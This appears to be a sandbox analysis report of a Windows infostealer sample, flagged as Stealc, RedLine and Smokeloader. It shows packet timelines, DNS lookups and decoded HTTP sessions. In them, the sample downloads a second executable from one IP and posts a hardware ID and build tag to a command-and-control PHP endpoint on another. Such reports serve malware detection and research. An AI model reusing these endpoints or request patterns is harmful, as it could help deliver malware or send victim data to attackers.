Oct 25, 2024 22:37:08.261373043 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.261373043 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.303059101 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.303083897 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.303102016 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.303141117 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.303168058 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.303174019 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.303210974 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.303242922 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.303260088 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.303284883 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.303299904 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.303590059 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.303637981 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.303674936 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.303714991 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.303826094 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.303842068 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.303857088 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.303868055 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.303884029 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.303905964 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.304241896 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.304292917 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.304640055 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.304687023 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.345561028 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.345671892 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.345870018 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.345933914 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.368729115 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.368752003 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.368781090 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.368798971 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.368815899 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.368813038 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.368813038 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.368813992 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.368832111 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.368892908 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.368892908 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.368892908 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.378427029 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.378453970 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.378472090 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.378489017 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.378520966 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.378521919 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.378598928 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.379659891 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.379689932 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.379717112 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.379770041 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.421253920 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.421281099 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.421298027 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.421314001 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.421331882 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.421439886 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.421439886 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.421439886 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.421678066 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.421703100 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.421720982 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.421731949 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.421736956 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.421755075 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.421760082 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.421760082 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.421791077 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.421791077 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.463121891 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.463177919 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.463216066 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.463252068 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.463309050 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.463310003 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.463363886 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.486519098 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.486581087 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.486613035 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.486627102 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.486644030 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.486665964 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.486685038 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.486702919 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.486713886 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.486747026 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.486833096 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.486884117 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.495991945 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.496083021 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.496092081 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.496129036 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.496133089 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.496164083 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.496180058 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.496201038 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.496206045 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.496237993 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.496403933 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.496403933 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.538872004 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.538928032 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.538949966 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.538975954 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.538981915 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.539035082 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.539074898 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.539105892 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.539189100 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.539189100 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.539189100 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.539189100 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.539208889 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.539256096 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.539263964 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.539303064 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.539323092 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.539341927 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.539386988 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.539431095 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.539876938 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.539933920 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.539935112 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.539968967 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.539980888 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.540014982 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.580868006 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.580924988 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.580944061 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.580965996 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.580974102 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.581033945 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.603935003 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.603984118 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.604037046 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.604037046 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.604043007 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.604079008 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.604087114 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.604114056 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.604125977 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.604151964 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.604162931 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.604204893 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.613580942 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.613616943 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.613645077 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.613651991 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.613678932 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.613689899 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.613749981 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.613806009 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.613806963 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.613842010 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.613861084 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.613886118 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.662982941 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.663037062 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.663052082 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.663072109 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.663100004 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.663105965 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.663120985 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.663146019 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.663158894 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.663203001 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.663377047 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.663393021 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.663408041 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.663423061 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.663428068 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.663439989 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:08.663449049 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.663467884 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:08.663491011 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:12.140918970 CEST | 80 | 49731 | 176.113.115.37 | 192.168.2.4
Oct 25, 2024 22:37:12.141155958 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:37:12.758204937 CEST | 49732 | 80 | 192.168.2.4 | 62.204.41.177
Oct 25, 2024 22:37:12.795691013 CEST | 80 | 49732 | 62.204.41.177 | 192.168.2.4
Oct 25, 2024 22:37:12.798620939 CEST | 49732 | 80 | 192.168.2.4 | 62.204.41.177
Oct 25, 2024 22:37:12.798758030 CEST | 49732 | 80 | 192.168.2.4 | 62.204.41.177
Oct 25, 2024 22:37:12.804498911 CEST | 80 | 49732 | 62.204.41.177 | 192.168.2.4
Oct 25, 2024 22:37:13.687746048 CEST | 80 | 49732 | 62.204.41.177 | 192.168.2.4
Oct 25, 2024 22:37:13.687824965 CEST | 49732 | 80 | 192.168.2.4 | 62.204.41.177
Oct 25, 2024 22:37:14.001930952 CEST | 49732 | 80 | 192.168.2.4 | 62.204.41.177
Oct 25, 2024 22:37:14.007637978 CEST | 80 | 49732 | 62.204.41.177 | 192.168.2.4
Oct 25, 2024 22:37:15.321656942 CEST | 80 | 49732 | 62.204.41.177 | 192.168.2.4
Oct 25, 2024 22:37:15.321805954 CEST | 49732 | 80 | 192.168.2.4 | 62.204.41.177
Oct 25, 2024 22:37:20.474244118 CEST | 80 | 49732 | 62.204.41.177 | 192.168.2.4
Oct 25, 2024 22:37:20.475545883 CEST | 49732 | 80 | 192.168.2.4 | 62.204.41.177
Oct 25, 2024 22:37:35.219454050 CEST | 49732 | 80 | 192.168.2.4 | 62.204.41.177
Oct 25, 2024 22:38:54.141582966 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:38:54.453803062 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:38:55.063177109 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:38:56.266328096 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:38:58.674230099 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:39:03.484950066 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Oct 25, 2024 22:39:13.095679045 CEST | 49731 | 80 | 192.168.2.4 | 176.113.115.37
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 25, 2024 22:37:04.165034056 CEST | 54538 | 53 | 192.168.2.4 | 1.1.1.1
Oct 25, 2024 22:37:04.179153919 CEST | 53 | 54538 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 25, 2024 22:37:04.165034056 CEST | 192.168.2.4 | 1.1.1.1 | 0xb824 | Standard query (0) | post-to-me.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 25, 2024 22:37:04.179153919 CEST | 1.1.1.1 | 192.168.2.4 | 0xb824 | No error (0) | post-to-me.com | | 104.21.56.70 | A (IP address) | IN (0x0001) | false
Oct 25, 2024 22:37:04.179153919 CEST | 1.1.1.1 | 192.168.2.4 | 0xb824 | No error (0) | post-to-me.com | | 172.67.179.207 | A (IP address) | IN (0x0001) | false
                                                      • post-to-me.com
                                                      • 176.113.115.37
                                                      • 62.204.41.177
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49731 | 176.113.115.37 | 80 | 7348 | C:\Users\user\Desktop\VAIIBIHmtT.exe
Timestamp | Bytes transferred | Direction | Data
Oct 25, 2024 22:37:05.792231083 CEST | 85 | OUT | GET /ScreenUpdateSync.exe HTTP/1.1
User-Agent: ShareScreen
Host: 176.113.115.37
Oct 25, 2024 22:37:06.688033104 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Fri, 25 Oct 2024 20:37:06 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Fri, 25 Oct 2024 20:30:02 GMT
ETag: "55e00-62552fbce3b10"
Accept-Ranges: bytes
Content-Length: 351744
Content-Type: application/x-msdos-program
                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$}\]]]\CACLCzRhZ]!C\C\C\Rich]PELIep@&P}.textop `.rdata"$t@@.data|H@.rsrc]~@@


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49732 | 62.204.41.177 | 80 | 7456 | C:\Users\user\AppData\Local\Temp\81C9.tmp.exe
Timestamp | Bytes transferred | Direction | Data
Oct 25, 2024 22:37:12.798758030 CEST | 88 | OUT | GET / HTTP/1.1
    Host: 62.204.41.177
    Connection: Keep-Alive
    Cache-Control: no-cache
Oct 25, 2024 22:37:13.687746048 CEST | 203 | IN | HTTP/1.1 200 OK
    Date: Fri, 25 Oct 2024 20:37:13 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 0
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
Oct 25, 2024 22:37:14.001930952 CEST | 419 | OUT | POST /edd20096ecef326d.php HTTP/1.1
    Content-Type: multipart/form-data; boundary=----DAECFIJDAAAKECBFCGHI
    Host: 62.204.41.177
    Content-Length: 219
    Connection: Keep-Alive
    Cache-Control: no-cache
    Data Ascii (multipart body, CRLF line breaks restored from the raw bytes):
    ------DAECFIJDAAAKECBFCGHI
    Content-Disposition: form-data; name="hwid"

    B2BAB85921823381591466
    ------DAECFIJDAAAKECBFCGHI
    Content-Disposition: form-data; name="build"

    default9_cap
    ------DAECFIJDAAAKECBFCGHI--
Oct 25, 2024 22:37:15.321656942 CEST | 210 | IN | HTTP/1.1 200 OK
    Date: Fri, 25 Oct 2024 20:37:14 GMT
    Server: Apache/2.4.52 (Ubuntu)
    Content-Length: 8
    Keep-Alive: timeout=5, max=99
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
    Data Raw: 59 6d 78 76 59 32 73 3d
    Data Ascii: YmxvY2s= (base64 for "block")


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 104.21.56.70 | 443 | 7348 | C:\Users\user\Desktop\VAIIBIHmtT.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-25 20:37:05 UTC | 90 | OUT | GET /track_prt.php?sub=0&cc=DE HTTP/1.1
    User-Agent: ShareScreen
    Host: post-to-me.com
2024-10-25 20:37:05 UTC | 773 | IN | HTTP/1.1 200 OK
    Date: Fri, 25 Oct 2024 20:37:05 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    X-Powered-By: PHP/5.4.16
    cf-cache-status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jRTk7mK0HRksQrPZtCNTHW5xkZ7UN%2FWuY3dl8ZHMt2JTB51VsWQuyYuBA%2BLpgKDfX9UtMQAfeP4dR8BbJkWVp3V6EqToAg9zZVf5n4SwFrGG1KDCigA2nRbIHQRluzvUcA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8d8500a39cfc283f-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1436&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2836&recv_bytes=728&delivery_rate=2023759&cwnd=251&unsent_bytes=0&cid=aa9069e311051193&ts=744&x=0"
2024-10-25 20:37:05 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
    Data Ascii: "2\r\nok\r\n" (one chunk of 2 bytes containing "ok")
2024-10-25 20:37:05 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: "0\r\n\r\n" (zero-length chunk terminating the chunked body)


                                                      Target ID:0
                                                      Start time:16:37:02
                                                      Start date:25/10/2024
                                                      Path:C:\Users\user\Desktop\VAIIBIHmtT.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\VAIIBIHmtT.exe"
                                                      Imagebase:0x400000
                                                      File size:463'872 bytes
                                                      MD5 hash:35489D9DC0929E90B0B89B4F569DF8C1
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1708924923.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:1
                                                      Start time:16:37:03
                                                      Start date:25/10/2024
                                                      Path:C:\Users\user\Desktop\VAIIBIHmtT.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\VAIIBIHmtT.exe"
                                                      Imagebase:0x400000
                                                      File size:463'872 bytes
                                                      MD5 hash:35489D9DC0929E90B0B89B4F569DF8C1
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:2
                                                      Start time:16:37:08
                                                      Start date:25/10/2024
                                                      Path:C:\Users\user\AppData\Local\Temp\81C9.tmp.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\AppData\Local\Temp\81C9.tmp.exe"
                                                      Imagebase:0x400000
                                                      File size:351'744 bytes
                                                      MD5 hash:E00B441455DC50083BB537C343EB1B99
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.2008550485.0000000000825000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000002.00000002.2008531907.00000000007FB000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000003.1793176960.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.2008261653.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000002.00000002.2008666483.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                      Antivirus matches:
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 34%, ReversingLabs
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:5
                                                      Start time:16:37:14
                                                      Start date:25/10/2024
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7456 -s 1188
                                                      Imagebase:0xa50000
                                                      File size:483'680 bytes
                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                      Has elevated privileges:true
